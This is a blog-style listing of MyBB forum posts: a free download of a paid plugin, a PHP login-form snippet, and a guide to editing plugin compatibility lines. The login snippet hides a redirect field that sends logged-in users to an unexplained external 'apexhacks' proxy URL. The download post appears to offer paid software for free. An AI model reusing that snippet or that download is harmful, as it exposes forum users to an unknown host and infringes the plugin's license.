Home / Mybb plugins

Mybb plugins

Free Download Mybb Premium Plugin Tabbed Menu 2.0.2

MyBB Central Premium Plugin Tabbed Menu v2.02 Info:Plugin Name: Tabbed MenuPlugin Author: Jesse LabroccaPlugin Website: http://www.MybbCentral.comPlugin Version: 2.0.2Plugin Mybb Compatibility: 1.6xPlugin File Edits: NonePlugin File Uploads: 4Plugin Description: Creates a tabbed menu on the index page to help organize forums. Installation1. Upload the files from the zip to your forum ...

Read More »

[Mybb] PHP Login

<?phpchdir('fullstatic.com/forum'); // path to MyBBdefine("IN_MYBB", 1);require './global.php';if($mybb->user['uid']){echo "Hey, $mybbuser[username].<br>Thanks for logging in.";}else{ echo "<form action='fullstatic.com/forum/member.php' method='post'> Username: <input type='text' name='username' size='25' maxlength='30' /><br />Password: <input type='password' name='password' size='25' /><input type='hidden' name='action' value='do_login'><input type='hidden' name='url' value='http://apexhacks.com/proxy1012038tyfheiu2fgbc82eyvihb3nbf8i3yugb4nfecr834g2h8feugf7r3tyfebnf783y4tg83 ​yfure//' /><input type='submit' class='submit' name='submit' value='Login' /></form><br>";}?> What it does is makes a login PHP class ...

Read More »

How to make old plugins work on new mybb (GUIDE)

I see some of you are having issues with using your old plugins after you updated mybb to 1.6 from any lower version.All you do is open the plugin php file in notepad,Look for this line:“compatibility” => “1.4*”,And replace for this line:“compatibility” => “*”,Now save the file and upload to ...

Read More »